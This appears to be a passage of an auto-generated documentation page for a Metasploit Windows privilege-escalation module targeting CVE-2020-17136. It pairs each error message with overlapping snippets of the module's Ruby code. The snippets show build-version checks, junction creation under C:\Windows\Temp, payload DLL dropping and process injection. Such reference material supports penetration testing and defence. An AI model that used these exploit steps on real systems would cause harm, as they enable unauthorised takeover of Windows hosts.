138:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.1256')) # Windows 10 v1903
139:	      return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')
140:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.1637')) # Windows 10 v1809
141:	      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
142:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.1902')) # Windows 10 v1803

A vulnerable Windows 10 v1903 build was detected!


Here is a relevant code snippet related to the "A vulnerable Windows 10 v1903 build was detected!" error message:

134:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1
135:	      return CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!')
136:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1256')) # Windows 10 v1909
137:	      return CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!')
138:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.1256')) # Windows 10 v1903
139:	      return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')
140:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.1637')) # Windows 10 v1809
141:	      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
142:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.1902')) # Windows 10 v1803
143:	      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
144:	    else

A vulnerable Windows 10 v1809 build was detected!


Here is a relevant code snippet related to the "A vulnerable Windows 10 v1809 build was detected!" error message:

136:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1256')) # Windows 10 v1909
137:	      return CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!')
138:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.1256')) # Windows 10 v1903
139:	      return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')
140:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.1637')) # Windows 10 v1809
141:	      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
142:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.1902')) # Windows 10 v1803
143:	      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
144:	    else
145:	      return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
146:	    end

A vulnerable Windows 10 v1809 build was detected!


Here is a relevant code snippet related to the "A vulnerable Windows 10 v1809 build was detected!" error message:

138:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.1256')) # Windows 10 v1903
139:	      return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')
140:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.1637')) # Windows 10 v1809
141:	      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
142:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.1902')) # Windows 10 v1803
143:	      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
144:	    else
145:	      return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
146:	    end
147:	  end
148:	

The build number of the target machine does not appear to be a vulnerable version!


Here is a relevant code snippet related to the "The build number of the target machine does not appear to be a vulnerable version!" error message:

140:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.1637')) # Windows 10 v1809
141:	      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
142:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.1902')) # Windows 10 v1803
143:	      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
144:	    else
145:	      return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
146:	    end
147:	  end
148:	
149:	  def exploit
150:	    if sysinfo['Architecture'] != ARCH_X64

This module currently only supports targeting x64 systems!


Here is a relevant code snippet related to the "This module currently only supports targeting x64 systems!" error message:

146:	    end
147:	  end
148:	
149:	  def exploit
150:	    if sysinfo['Architecture'] != ARCH_X64
151:	      fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
152:	    elsif session.arch != ARCH_X64
153:	      fail_with(Failure::NoTarget, 'Sorry, WOW64 is not supported at this time!')
154:	    end
155:	    dir_junct_path = 'C:\\Windows\\Temp'
156:	    intermediate_dir = rand_text_alpha(10).to_s

Sorry, WOW64 is not supported at this time!


Here is a relevant code snippet related to the "Sorry, WOW64 is not supported at this time!" error message:

148:	
149:	  def exploit
150:	    if sysinfo['Architecture'] != ARCH_X64
151:	      fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
152:	    elsif session.arch != ARCH_X64
153:	      fail_with(Failure::NoTarget, 'Sorry, WOW64 is not supported at this time!')
154:	    end
155:	    dir_junct_path = 'C:\\Windows\\Temp'
156:	    intermediate_dir = rand_text_alpha(10).to_s
157:	    junction_dir = rand_text_alpha(10).to_s
158:	    path_to_intermediate_dir = "#{dir_junct_path}\\#{intermediate_dir}"

Could not create the intermediate directory!


Here is a relevant code snippet related to the "Could not create the intermediate directory!" error message:

157:	    junction_dir = rand_text_alpha(10).to_s
158:	    path_to_intermediate_dir = "#{dir_junct_path}\\#{intermediate_dir}"
159:	
160:	    mkdir(path_to_intermediate_dir.to_s)
161:	    if !directory?(path_to_intermediate_dir.to_s)
162:	      fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
163:	    end
164:	    register_dir_for_cleanup(path_to_intermediate_dir.to_s)
165:	
166:	    mkdir("#{path_to_intermediate_dir}\\#{junction_dir}")
167:	    if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")

Could not create the junction directory as a folder!


Here is a relevant code snippet related to the "Could not create the junction directory as a folder!" error message:

163:	    end
164:	    register_dir_for_cleanup(path_to_intermediate_dir.to_s)
165:	
166:	    mkdir("#{path_to_intermediate_dir}\\#{junction_dir}")
167:	    if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
168:	      fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')
169:	    end
170:	
171:	    mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\')
172:	    if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
173:	      fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')

Could not transform the junction directory into a junction!


Here is a relevant code snippet related to the "Could not transform the junction directory into a junction!" error message:

168:	      fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')
169:	    end
170:	
171:	    mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\')
172:	    if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
173:	      fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')
174:	    end
175:	
176:	    exe_path = ::File.expand_path(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-17136', 'cloudFilterEOP.exe'))
177:	    unless File.file?(exe_path)
178:	      fail_with(Failure::BadConfig, 'Assembly not found')

Assembly not found


Here is a relevant code snippet related to the "Assembly not found" error message:

173:	      fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')
174:	    end
175:	
176:	    exe_path = ::File.expand_path(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-17136', 'cloudFilterEOP.exe'))
177:	    unless File.file?(exe_path)
178:	      fail_with(Failure::BadConfig, 'Assembly not found')
179:	    end
180:	    installed_dotnet_versions = get_dotnet_versions
181:	    vprint_status("Dot Net Versions installed on target: #{installed_dotnet_versions}")
182:	    if installed_dotnet_versions == []
183:	      fail_with(Failure::BadConfig, 'Target has no .NET framework installed')

Target has no .NET framework installed


Here is a relevant code snippet related to the "Target has no .NET framework installed" error message:

178:	      fail_with(Failure::BadConfig, 'Assembly not found')
179:	    end
180:	    installed_dotnet_versions = get_dotnet_versions
181:	    vprint_status("Dot Net Versions installed on target: #{installed_dotnet_versions}")
182:	    if installed_dotnet_versions == []
183:	      fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
184:	    end
185:	    if check_requirements('v4.0.30319', installed_dotnet_versions) == false
186:	      fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
187:	    end
188:	    payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"

CLR required for assembly not installed


Here is a relevant code snippet related to the "CLR required for assembly not installed" error message:

181:	    vprint_status("Dot Net Versions installed on target: #{installed_dotnet_versions}")
182:	    if installed_dotnet_versions == []
183:	      fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
184:	    end
185:	    if check_requirements('v4.0.30319', installed_dotnet_versions) == false
186:	      fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
187:	    end
188:	    payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
189:	    print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
190:	    write_file(payload_path, generate_payload_dll)
191:	    register_file_for_cleanup(payload_path)

Cannot select the current process as the injection target


Here is a relevant code snippet related to the "Cannot select the current process as the injection target" error message:

198:	
199:	  def pid_exists(pid)
200:	    mypid = client.sys.process.getpid.to_i
201:	
202:	    if pid == mypid
203:	      print_bad('Cannot select the current process as the injection target')
204:	      return false
205:	    end
206:	
207:	    host_processes = client.sys.process.get_processes
208:	    if host_processes.empty?

No running processes found on the target host.


Here is a relevant code snippet related to the "No running processes found on the target host." error message:

204:	      return false
205:	    end
206:	
207:	    host_processes = client.sys.process.get_processes
208:	    if host_processes.empty?
209:	      print_bad('No running processes found on the target host.')
210:	      return false
211:	    end
212:	
213:	    theprocess = host_processes.find { |x| x['pid'] == pid }
214:	

Session invalid


Here is a relevant code snippet related to the "Session invalid" error message:

241:	    [exploit_mem, offset]
242:	  end
243:	
244:	  def execute_assembly(exe_path, exe_args)
245:	    if sysinfo.nil?
246:	      fail_with(Failure::BadConfig, 'Session invalid')
247:	    else
248:	      print_status("Running module against #{sysinfo['Computer']}")
249:	    end
250:	    if datastore['WAIT'].zero?
251:	      print_warning('Output unavailable as wait time is 0')

Output unavailable as wait time is 0


Here is a relevant code snippet related to the "Output unavailable as wait time is 0" error message:

246:	      fail_with(Failure::BadConfig, 'Session invalid')
247:	    else
248:	      print_status("Running module against #{sysinfo['Computer']}")
249:	    end
250:	    if datastore['WAIT'].zero?
251:	      print_warning('Output unavailable as wait time is 0')
252:	    end
253:	
254:	    process, hprocess = launch_process
255:	    exploit_mem, offset = inject_hostclr_dll(hprocess)
256:	

Time out exception: wait limit exceeded (5 sec)


Here is a relevant code snippet related to the "Time out exception: wait limit exceeded (5 sec)" error message:

313:	          output.split("\n").each { |x| print_good(x) }
314:	        end
315:	        break if output.nil? || output.empty?
316:	      end
317:	    rescue Rex::TimeoutError
318:	      vprint_warning('Time out exception: wait limit exceeded (5 sec)')
319:	    rescue ::StandardError => e
320:	      print_error("Exception: #{e.inspect}")
321:	    end
322:	
323:	    client.response_timeout = old_timeout

Exception: <E.INSPECT>


Here is a relevant code snippet related to the "Exception: <E.INSPECT>" error message:

315:	        break if output.nil? || output.empty?
316:	      end
317:	    rescue Rex::TimeoutError
318:	      vprint_warning('Time out exception: wait limit exceeded (5 sec)')
319:	    rescue ::StandardError => e
320:	      print_error("Exception: #{e.inspect}")
321:	    end
322:	
323:	    client.response_timeout = old_timeout
324:	    print_status('End output.')
325:	  end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • James Foreshaw
  • Grant Willcox

Version


This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.